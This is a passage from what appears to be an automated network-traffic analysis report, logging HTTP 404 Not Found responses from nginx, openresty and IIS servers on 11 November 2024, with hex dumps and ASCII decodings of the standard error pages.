6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:02 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:13:07 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:13:07 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:13 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:14 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:24 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:13:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:13:19 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:25 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:13:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 